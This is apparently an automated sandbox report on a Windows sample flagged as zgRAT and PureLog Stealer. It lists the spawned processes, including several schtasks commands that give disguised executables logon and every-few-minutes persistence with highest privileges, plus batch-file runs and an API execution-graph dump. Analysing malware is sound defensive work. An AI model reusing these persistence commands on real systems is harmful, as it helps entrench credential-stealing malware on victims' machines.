                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                                                                  Imagebase:0x7ff768690000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff75da30000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:36
                                                                  Start time:06:48:18
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff73b7a0000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:06:48:19
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\containerReview.exe
                                                                  Imagebase:0xba0000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:06:48:19
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\containerReview.exe
                                                                  Imagebase:0xa30000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:06:48:23
                                                                  Start date:13/01/2025
                                                                  Path:C:\ProgramData\dbg\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\All Users\dbg\containerReview.exe"
                                                                  Imagebase:0x770000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 83%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:40
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat"
                                                                  Imagebase:0x7ff768690000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:41
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:42
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff75da30000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:43
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff73b7a0000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:44
                                                                  Start time:06:48:27
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                                                  Imagebase:0xe30000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 83%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:45
                                                                  Start time:06:48:30
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\blockcomSession\mQBLhXIPAJ.exe"
                                                                  Imagebase:0xcb0000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:46
                                                                  Start time:06:48:35
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\blockcomSession\containerReview.exe"
                                                                  Imagebase:0xf00000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:6.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:23.1%
                                                                    Total number of Nodes:769
                                                                    Total number of Limit Nodes:42
df0828 40476->40477 40477->40442 40492 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40478->40492 40480 dfa5cd 40481 dfa5d9 40480->40481 40493 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40480->40493 40481->40453 40481->40454 40481->40456 40484 dfa6db __InternalCxxFrameHandler 40483->40484 40485 dfa754 CreateStreamOnHGlobal 40484->40485 40488 dfa776 40484->40488 40486 dfa76c 40485->40486 40485->40488 40494 dfa626 73516BB0 40486->40494 40488->40450 40489->40457 40490->40461 40491->40463 40492->40480 40493->40481 40495 dfa638 40494->40495 40495->40488 40497 deda75 _wcschr __EH_prolog 40496->40497 40526 de98e0 40497->40526 40500 dedb05 40513 dedd4a 40500->40513 40530 e06310 40500->40530 40503 dedb44 40504 e06310 2 API calls 40503->40504 40512 dedb56 ___vcrt_FlsGetValue 40504->40512 40505 dedc85 40505->40513 40554 de9d70 SetFilePointer SetFilePointer 40505->40554 40507 de9e80 SetFilePointer 40507->40512 40509 dedc9f ___std_exception_copy 40510 de9bd0 2 API calls 40509->40510 40509->40513 40524 dedcc8 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 40510->40524 40512->40505 40512->40507 40512->40513 40549 de9bd0 40512->40549 40553 de9d70 SetFilePointer SetFilePointer 40512->40553 40542 de959a 40513->40542 40514 dee159 40520 dee1c6 40514->40520 40558 e08cce UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40514->40558 40517 dee16e 40559 e07625 UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40517->40559 40519 e06310 2 API calls 40521 dee22d 40519->40521 40520->40519 40522 e06310 2 API calls 40521->40522 40522->40513 40524->40513 40524->40514 40555 dee5b1 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter __vsnprintf 40524->40555 40556 e08cce UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40524->40556 40557 e07625 UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40524->40557 40528 de98ea 40526->40528 40527 de994b CreateFileW 40529 de996c 40527->40529 
40528->40527 40529->40500 40531 e06349 40530->40531 40532 e0634d 40531->40532 40538 e06375 40531->40538 40560 e09087 UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40532->40560 40533 e06699 40534 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40533->40534 40536 e066a6 40534->40536 40536->40503 40537 e0635d 40539 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40537->40539 40538->40533 40561 e06230 UnhandledExceptionFilter _ValidateLocalCookies 40538->40561 40541 e06369 40539->40541 40541->40503 40543 de95be 40542->40543 40544 de95cf 40542->40544 40543->40544 40545 de95ca 40543->40545 40546 de95d1 40543->40546 40544->40466 40562 de974e 40545->40562 40567 de9620 40546->40567 40551 de9bdc 40549->40551 40552 de9be3 40549->40552 40550 de9785 ReadFile GetFileType 40550->40552 40551->40512 40552->40550 40552->40551 40553->40512 40554->40509 40555->40524 40556->40524 40557->40524 40558->40517 40559->40520 40560->40537 40561->40538 40563 de9757 40562->40563 40564 de9781 40562->40564 40563->40564 40571 dea1e0 40563->40571 40564->40544 40566 de977f 40566->40544 40568 de962c 40567->40568 40569 de964a 40567->40569 40568->40569 40570 de9638 CloseHandle 40568->40570 40569->40544 40570->40569 40572 dfec50 40571->40572 40573 dea1ed DeleteFileW 40572->40573 40574 dea200 40573->40574 40574->40566 40576 dfeb3d ___std_exception_copy 40575->40576 40578 dfeb57 _com_raise_error 40576->40578 40579 e07a5e UnhandledExceptionFilter _ValidateLocalCookies 40576->40579 40578->40469 40579->40576 40581 e07ce1 _abort 40580->40581 40584 e07cf9 _abort 40581->40584 40605 e07e73 40581->40605 40583 e07d76 40587 e07d8e 40583->40587 40591 e08a91 _abort UnhandledExceptionFilter 40583->40591 40584->40583 40595 e07d9f _abort 40584->40595 40609 e087e0 UnhandledExceptionFilter RtlFreeHeap _abort 40584->40609 40585 e07de8 40610 e12390 UnhandledExceptionFilter _ValidateLocalCookies 40585->40610 40586 e07dbc 40596 e07dee 40586->40596 40592 e08a91 _abort 
UnhandledExceptionFilter 40587->40592 40591->40587 40592->40595 40595->40585 40595->40586 40611 e0b076 40596->40611 40599 e07e0c 40601 e07e73 _abort UnhandledExceptionFilter 40599->40601 40600 e07dfc GetPEB 40600->40599 40602 e07e24 40601->40602 40615 52566f9 RtlExitUserProcess 40602->40615 40606 e07e99 40605->40606 40607 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40606->40607 40608 e07ed9 40607->40608 40608->40584 40609->40583 40614 e0b091 _abort 40611->40614 40612 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40613 e07df8 40612->40613 40613->40599 40613->40600 40614->40612 40616 e07e2e 40615->40616 40617 e0b8fd 40618 e0b90a 40617->40618 40625 e0ab78 40618->40625 40621 e0ab78 2 API calls 40622 e0b977 40621->40622 40623 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40622->40623 40624 e0ba23 40623->40624 40626 e0ab8b 40625->40626 40629 e0a95b 40626->40629 40630 e0a976 40629->40630 40631 e0ab50 40630->40631 40634 e08e06 UnhandledExceptionFilter 40630->40634 40636 e0a9e7 40630->40636 40632 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40631->40632 40633 e0ab63 40632->40633 40633->40621 40634->40636 40635 e0aa9c 40658 e0abc3 RtlFreeHeap _free 40635->40658 40636->40635 40651 e0af6c 40636->40651 40640 e0aa73 40640->40635 40642 e0af6c UnhandledExceptionFilter 40640->40642 40641 e0aaab 40644 e08e06 UnhandledExceptionFilter 40641->40644 40647 e0aacc 40641->40647 40642->40635 40643 e0ab41 40657 e0abc3 RtlFreeHeap _free 40643->40657 40644->40647 40645 e0af6c UnhandledExceptionFilter 40648 e0ab20 40645->40648 40647->40643 40647->40645 40648->40643 40649 e0ab6f 40648->40649 40659 e0abc3 RtlFreeHeap _free 40649->40659 40652 e0af93 _abort 40651->40652 40654 e0af9c 40652->40654 40660 e0aff4 UnhandledExceptionFilter _abort _ValidateLocalCookies 40652->40660 40655 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40654->40655 40656 e0aa60 40655->40656 40656->40635 40656->40640 40656->40641 40657->40635 40658->40631 40659->40635 40660->40654 
40661 dfdec2 40662 dfdecf _swprintf 40661->40662 40663 dfdef1 SetDlgItemTextW 40662->40663 40666 dfb568 PeekMessageW 40663->40666 40667 dfb5bc 40666->40667 40668 dfb583 GetMessageW 40666->40668 40669 dfb599 IsDialogMessageW 40668->40669 40670 dfb5a8 TranslateMessage DispatchMessageW 40668->40670 40669->40667 40669->40670 40670->40667 40671 dfb7e0 40672 dfb7ea __EH_prolog 40671->40672 40787 de1316 40672->40787 40675 dfbf0f 40824 dfd69e 40675->40824 40676 dfb82a 40679 dfb89b 40676->40679 40680 dfb838 40676->40680 40732 dfb841 _swprintf _wcslen 40676->40732 40683 dfb92e GetDlgItemTextW 40679->40683 40687 dfb8b1 40679->40687 40691 dfb83c 40680->40691 40743 dfb878 40680->40743 40681 dfbf2a SendMessageW 40682 dfbf38 40681->40682 40685 dfbf52 GetDlgItem SendMessageW 40682->40685 40686 dfbf41 SendDlgItemMessageW 40682->40686 40684 dfb96b 40683->40684 40683->40743 40690 dfb980 GetDlgItem 40684->40690 40784 dfb974 40684->40784 40841 dfa64d 40685->40841 40686->40685 40695 dfb8ce SetDlgItemTextW 40687->40695 40689 dfb95f EndDialog 40689->40732 40693 dfb9b7 SetFocus 40690->40693 40694 dfb994 SendMessageW SendMessageW 40690->40694 40691->40732 40860 de124f SHGetMalloc 40691->40860 40699 dfb9c7 40693->40699 40714 dfb9e0 _swprintf 40693->40714 40694->40693 40700 dfb8d9 40695->40700 40697 dfbf9f 40698 dfbfa5 SetWindowTextW 40697->40698 40843 dfabab GetClassNameW 40698->40843 40861 dfd4d4 40699->40861 40704 dfb8e6 GetMessageW 40700->40704 40700->40732 40701 dfb862 40709 dfc1fc SetDlgItemTextW 40701->40709 40701->40732 40702 dfbe55 40710 dfbe65 SetDlgItemTextW 40702->40710 40707 dfb8fd IsDialogMessageW 40704->40707 40704->40732 40707->40700 40712 dfb90c TranslateMessage DispatchMessageW 40707->40712 40709->40732 40710->40732 40712->40700 40713 dfbff0 40718 dfc020 40713->40718 40722 dfc003 SetDlgItemTextW 40713->40722 40723 dfd4d4 16 API calls 40714->40723 40715 dfb9d9 40797 dea0b1 40715->40797 40717 dfc73f 7 API calls 40717->40713 40720 dfc0d8 40718->40720 40724 dfc73f 7 API calls 
40718->40724 40721 dfc18b 40720->40721 40744 dfc169 40720->40744 40725 dfc19d 40721->40725 40726 dfc194 EnableWindow 40721->40726 40728 dee617 40722->40728 40723->40715 40729 dfc03b 40724->40729 40730 dfc1ba 40725->40730 40877 de12d3 GetDlgItem EnableWindow 40725->40877 40726->40725 40731 dfc017 SetDlgItemTextW 40728->40731 40733 dfc04d 40729->40733 40746 dfc072 40729->40746 40730->40701 40741 dfc1d9 SendMessageW 40730->40741 40731->40718 40875 df9ed5 7 API calls 40733->40875 40734 dfc0cb 40736 dfc73f 7 API calls 40734->40736 40736->40720 40738 dfc1b0 40878 de12d3 GetDlgItem EnableWindow 40738->40878 40739 dfbd56 40808 de12f1 GetDlgItem ShowWindow 40739->40808 40741->40701 40743->40689 40743->40732 40876 df9ed5 7 API calls 40744->40876 40745 dfc066 40745->40746 40746->40734 40751 dfc73f 7 API calls 40746->40751 40747 dfbd66 40809 de12f1 GetDlgItem ShowWindow 40747->40809 40750 dfc188 40750->40721 40753 dfc0a0 40751->40753 40752 dfbd70 40756 dfbd7a SetDlgItemTextW 40752->40756 40753->40734 40755 dfc0a9 DialogBoxParamW 40753->40755 40754 dfba87 _swprintf 40763 dfbb20 _swprintf 40754->40763 40766 dfbb11 40754->40766 40804 de966e 40754->40804 40755->40734 40755->40743 40810 de12f1 GetDlgItem ShowWindow 40756->40810 40759 dfbd8c SetDlgItemTextW GetDlgItem 40761 dfbda9 GetWindowLongW SetWindowLongW 40759->40761 40762 dfbdc1 40759->40762 40760 dfbaed 40764 de959a 2 API calls 40760->40764 40761->40762 40811 dfc73f 40762->40811 40763->40732 40763->40743 40771 dfbbf4 40763->40771 40786 dfbc28 __InternalCxxFrameHandler 40763->40786 40764->40766 40766->40739 40766->40763 40767 dfbc6b ShellExecuteExW 40782 dfbc88 40767->40782 40769 dfc73f 7 API calls 40770 dfbddd 40769->40770 40818 dfda52 40770->40818 40871 dfb425 SHGetMalloc 40771->40871 40774 dfbdee 40776 dfc73f 7 API calls 40774->40776 40775 dfbc10 40872 dfb425 SHGetMalloc 40775->40872 40783 dfbe03 40776->40783 40778 dfbc1c 40873 dfb425 SHGetMalloc 40778->40873 40779 dfbe2c 40874 de12d3 GetDlgItem EnableWindow 40779->40874 
40782->40743 40783->40779 40785 dfc73f 7 API calls 40783->40785 40784->40702 40784->40743 40785->40779 40786->40767 40788 de131f 40787->40788 40789 de1378 40787->40789 40791 de1385 40788->40791 40879 dee2e8 10 API calls 2 library calls 40788->40879 40880 dee2c1 GetWindowLongW SetWindowLongW 40789->40880 40791->40675 40791->40676 40791->40732 40793 de1341 40793->40791 40794 de1354 GetDlgItem 40793->40794 40794->40791 40795 de1364 40794->40795 40795->40791 40796 de136a SetWindowTextW 40795->40796 40796->40791 40800 dea0bb 40797->40800 40798 dea14c 40799 dea2b2 4 API calls 40798->40799 40802 dea175 40798->40802 40799->40802 40800->40798 40800->40802 40881 dea2b2 40800->40881 40803 dfac04 SetCurrentDirectoryW 40802->40803 40803->40754 40805 de9678 40804->40805 40806 de96d5 CreateFileW 40805->40806 40807 de96c9 40805->40807 40806->40807 40807->40760 40808->40747 40809->40752 40810->40759 40817 dfc749 _swprintf _abort _wcslen __EH_prolog _wcsrchr 40811->40817 40812 dfbdcf 40812->40769 40813 dfca67 SetWindowTextW 40813->40817 40815 dfcc31 GetDlgItem SetWindowTextW SendMessageW 40815->40817 40816 dfcc71 SendMessageW 40816->40817 40817->40812 40817->40813 40817->40815 40817->40816 40893 dea5d1 FindFirstFileW FindFirstFileW 40817->40893 40819 dfda5c __EH_prolog 40818->40819 40894 de7b0d 40819->40894 40823 dfdafe 40823->40774 40825 dfd6a8 40824->40825 40826 dfa5c6 4 API calls 40825->40826 40827 dfd6ad 40826->40827 40828 dfd6b5 GetWindow 40827->40828 40829 dfbf15 40827->40829 40828->40829 40831 dfd6d5 40828->40831 40829->40681 40829->40682 40830 dfd6e2 GetClassNameW 40830->40831 40831->40829 40831->40830 40832 dfd76a GetWindow 40831->40832 40833 dfd706 GetWindowLongW 40831->40833 40832->40829 40832->40831 40833->40832 40834 dfd716 SendMessageW 40833->40834 40834->40832 40835 dfd72c GetObjectW 40834->40835 41180 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40835->41180 40837 dfd743 41181 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40837->41181 41182 dfa80c 8 API 
calls 40837->41182 40840 dfd754 SendMessageW DeleteObject 40840->40832 40842 dfa65b GetDlgItem 40841->40842 40842->40697 40842->40698 40844 dfabcc 40843->40844 40845 dfabf1 40843->40845 40844->40845 40846 dfabe3 FindWindowExW 40844->40846 40847 dfb093 40845->40847 40846->40845 40848 dfb09d __EH_prolog 40847->40848 40849 de13dc 3 API calls 40848->40849 40850 dfb0bf 40849->40850 41183 de1fdc 40850->41183 40852 dfb0d1 40853 dfb0eb 40852->40853 40854 dfb0d9 40852->40854 40856 de19af 21 API calls 40853->40856 40855 de1692 2 API calls 40854->40855 40857 dfb0e4 40855->40857 40859 dfb10d __InternalCxxFrameHandler ___std_exception_copy 40856->40859 40857->40713 40857->40717 40858 de1692 2 API calls 40858->40857 40859->40858 40860->40701 40862 dfb568 5 API calls 40861->40862 40863 dfd4e0 GetDlgItem 40862->40863 40864 dfd536 SendMessageW SendMessageW 40863->40864 40865 dfd502 40863->40865 40866 dfd572 40864->40866 40867 dfd591 SendMessageW SendMessageW SendMessageW 40864->40867 40870 dfd50d ShowWindow SendMessageW SendMessageW 40865->40870 40866->40867 40868 dfd5e7 SendMessageW 40867->40868 40869 dfd5c4 SendMessageW 40867->40869 40868->40715 40869->40868 40870->40864 40871->40775 40872->40778 40873->40786 40874->40784 40875->40745 40876->40750 40877->40738 40878->40730 40879->40793 40880->40791 40882 dea2bf 40881->40882 40883 dea2e3 40882->40883 40884 dea2d6 CreateDirectoryW 40882->40884 40885 dea231 2 API calls 40883->40885 40884->40883 40886 dea2e9 40884->40886 40885->40886 40887 dea325 40886->40887 40889 dea4ed 40886->40889 40887->40800 40890 dfec50 40889->40890 40891 dea4fa SetFileAttributesW 40890->40891 40892 dea510 40891->40892 40892->40887 40893->40817 40895 de7b17 __EH_prolog 40894->40895 40908 dece40 40895->40908 40897 de7b32 40898 dfeb38 UnhandledExceptionFilter 40897->40898 40899 de7b5c 40898->40899 40914 df4a76 40899->40914 40901 de7b8b 40902 de7c7d 40901->40902 40903 de7c87 40902->40903 40906 de7cf1 40903->40906 40937 dea56d 40903->40937 40905 de7d50 
40905->40823 40906->40905 40918 de8284 40906->40918 40909 dece4a __EH_prolog 40908->40909 40910 dfeb38 UnhandledExceptionFilter 40909->40910 40912 dece8d 40910->40912 40911 dfeb38 UnhandledExceptionFilter 40913 deceb1 40911->40913 40912->40911 40913->40897 40915 df4a80 __EH_prolog 40914->40915 40916 dfeb38 UnhandledExceptionFilter 40915->40916 40917 df4a9c 40916->40917 40917->40901 40919 de828e __EH_prolog 40918->40919 40943 de13dc 40919->40943 40921 de82aa 40923 de82f2 40921->40923 40951 de1a04 40921->40951 41052 de1692 40923->41052 40926 de8389 40963 de8430 40926->40963 40928 de83a3 40929 de83e8 40928->40929 40966 df1b66 40928->40966 40969 de1f6d 40929->40969 40930 de82ee 40930->40923 40930->40926 40935 dea56d 3 API calls 40930->40935 40933 de83f3 40933->40923 40973 de3b2d 40933->40973 40983 de848e 40933->40983 40935->40930 40938 dea582 40937->40938 40939 dea5b0 40938->40939 41174 dea69b 40938->41174 40939->40903 40941 dea592 40941->40939 40942 dea597 FindClose 40941->40942 40942->40939 40944 de13e6 __EH_prolog 40943->40944 40945 dece40 UnhandledExceptionFilter 40944->40945 40946 de1419 40945->40946 40947 dfeb38 UnhandledExceptionFilter 40946->40947 40950 de1474 _abort 40946->40950 40948 de1461 40947->40948 40949 deb505 2 API calls 40948->40949 40948->40950 40949->40950 40950->40921 40952 de1a0e __EH_prolog 40951->40952 40957 de1a61 40952->40957 40960 de1b9b 40952->40960 40962 de9e80 SetFilePointer 40952->40962 40953 de3b2d 2 API calls 40954 de1c12 40953->40954 40955 de3b2d 2 API calls 40954->40955 40956 de1c5a 40954->40956 40955->40954 40956->40960 40961 de9e80 SetFilePointer 